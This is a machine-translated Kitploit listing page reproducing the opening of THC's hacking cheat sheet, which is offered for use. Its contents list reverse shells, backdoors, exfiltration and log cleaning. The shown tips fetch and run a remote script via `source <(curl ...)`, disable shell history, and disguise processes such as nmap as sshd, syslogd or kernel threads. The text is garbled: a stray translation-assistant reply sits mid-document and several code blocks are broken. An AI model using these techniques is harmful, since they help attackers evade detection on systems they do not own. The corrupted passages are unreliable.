Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
thc-tips-tricks-hacks-cheat-sheet — 各种技巧与诀窍 | Kitploit
工具/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (开源情报)持久化机制横向移动数据泄露信息收集后渗透利用渗透测试红队精选资源

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

各种技巧与诀窍

查看仓库
3.9k471543个月前Kitploit 审核通过

THC 最爱的技巧、窍门与黑客手法(速查表)

https://thc.org/tips

这是我们最喜欢的一些技巧的合集。其中许多技巧并非我们原创,我们只是收集整理。

我们按原样展示这些技巧,不解释其原理。你需要了解 Linux 才能理解它们的工作方式和原因。

有好技巧?加入我们 https://thc.org/ops

  1. Bash
    1. 设置 Hack Shell
    2. 隐藏你的命令
    3. 隐藏你的命令行选项
    4. 隐藏网络连接
    5. 以用户身份隐藏进程
    6. 以 root 身份隐藏进程
    7. 隐藏脚本
    8. 对 cat 隐藏
    9. 并行执行并分别记录日志
  2. SSH
    1. 几乎不可见的 SSH
    2. 通过单条 SSH/TCP 连接实现多个 Shell
    3. SSH 隧道
    4. SSH SOCKS5 隧道
    5. SSH 连接到 NAT 后面的主机
    6. 通过 ProxyJump 实现 SSH 跳转
    7. 以用户身份运行 SSHD
  3. 网络
    1. 发现主机
    2. Tcpdump
    3. 隧道与转发
      1. 原始 TCP 反向端口
      2. HTTPS 反向转发
      3. 使用 iptables 反弹流量
      4. 幽灵 IP / IP 欺骗
      5. 其他
    4. 通过 SOCKS 代理使用任何工具
    5. 查找你的公网 IP 地址
    6. 从世界各地检查可达性
    7. 检查/扫描开放端口
    8. 破解密码哈希
    9. 暴力破解密码 / 密钥
  4. 数据上传/下载/外传
    1. 文件编码/解码
    2. 使用剪切粘贴传输文件
    3. 使用 tmux 传输文件
    4. 使用 screen 传输文件
    5. 使用 gs-netcat 和 sftp 传输文件
    6. 使用 HTTP 传输文件
    7. 无需 curl 下载文件
    8. 使用 rsync 传输文件
    9. 传输文件到公共转储站点
    10. 使用 WebDAV 传输文件
    11. 传输文件到 Telegram
  5. 反向 Shell / 哑 Shell
    1. 反向 Shell
      1. 使用 gs-netcat(加密)
      2. 使用 Bash
      3. 使用 cURL(加密)
      4. 使用 cURL(明文)
      5. 使用 OpenSSL(加密)
      6. 使用 remote.moe(加密)
      7. 不使用 /dev/tcp
      8. 使用 Python
      9. 使用 Perl
    2. 升级哑 Shell
      1. 将反向 Shell 升级为 PTY Shell
      2. 将反向 Shell 升级为完全交互式 Shell
      3. 使用 socat 的反向 Shell(完全交互)
  6. 后门
    1. gs-netcat
    2. sshx.io
    3. 最小的 SSHD 后门
    4. 远程访问整个网络
    5. 最小的 PHP 后门
    6. 最小的反向 DNS 隧道后门
    7. 本地 root 后门
    8. 自解压植入程序
  7. 主机侦察
  8. Shell 技巧
    1. 粉碎文件(安全删除)
    2. 恢复文件的时间戳
    3. 清理日志文件
    4. 在没有 root 权限的情况下对用户隐藏文件
    5. 使文件不可变
    6. 不使用 sudo/su 切换用户
    7. 混淆和加密 Payload
    8. 在不接触文件系统的情况下部署后门
  9. 加密
    1. 快速生成随机密码
    2. Linux 可移植加密文件系统
      1. cryptsetup
      2. EncFS
    3. 加密文件
  10. 会话嗅探与劫持
    1. 嗅探用户的 SHELL 会话
    2. 使用 dtrace 嗅探所有 SHELL 会话
    3. 使用 eBPF 嗅探所有 SHELL 会话
    4. 使用 strace 嗅探用户的 SSH 或 SSHD 会话
    5. 使用包装脚本嗅探用户的外发 SSH 会话
    6. 使用 SSH-IT 嗅探用户的外发 SSH 会话
    7. 劫持/接管正在运行的 SSH 会话
  11. VPN 与 Shell
    1. 一次性 Root 服务器
    2. VPN/VPS 提供商
  12. OSINT 情报收集
  13. 杂项
    1. 常用工具
    2. 实用的 Linux 命令
    3. tmux 速查表
    4. 有用的命令
  14. 如何成为一名黑客
  15. 其他网站

1. Bash / Shell

1.i. 设置 Hack Shell(bash):

让 BASH 更安静。禁用 ~/.bash_history 以及许多其他功能。```sh source <(curl -SsfL https://thc.org/hs)

备用 URL:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

如果没有 curl/wget,使用 surl 和(临时)安装的 curl,通过 bin curl 调用。```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell 能做的远不止这些,但最重要的是:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

我们大量使用 anew,这是一个快速的变通方法:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

额外提示:
任何以" "(空格)开头的命令也[不会被记录到历史记录中](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces)。```
$  id

1.ii. 隐藏你的命令 / 守护进程化你的命令

这将仅隐藏进程名称。使用 zapper 还可隐藏命令行选项。```shell (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'

启动一个后台的 'nmap',伪装成 '/usr/sbin/sshd':```
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)

在 GNU screen 中启动:``` screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24

Attach back to the nmap process

screen -x MyName

或者,将二进制文件复制到一个新名称:```sh
cd /dev/shm
cp "$(command -v nmap)" syslogd
PATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24

或者改用绑定挂载,(临时)让 /sbin/init 指向 /dev/shm/nmap:```shell mount -n --bind "$(command -v nmap)" /sbin/init

starting /sbin/init will instead execute nmap

(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 &>nmap.log &)

<a id="zap"></a>
**1.iii. 隐藏你的命令行选项**

使用 [zapper](https://github.com/hackerschoice/zapper):```sh
curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && \
chmod 755 zapper

I apologize, but I notice there is no actual content in your message. The message ends with "INPUT:" but no Markdown content follows it.

Please provide the actual chunk content to translate.```sh

Start Nmap but zap all options and show it as 'klog' in the process list:

./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24

Started as a daemon and sshd-style name:

(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 &>nmap.log &)

Replace the existing shell with tmux (with 'exec').

Then start and hide tmux and all further processes - as some kernel process:

exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux

<a id="bash-hide-connection"></a>
**1.iv. 隐藏网络连接**

技巧是劫持 `netstat`,并使用 grep 过滤掉我们的连接。此示例过滤端口 31337 _或_ ip 1.2.3.4 上的任何连接。对于 `ss`(netstat 的替代方案)也应如此。

**方法 1 - 使用 ~/.bashrc 中的 bash 函数隐藏连接**
下载工具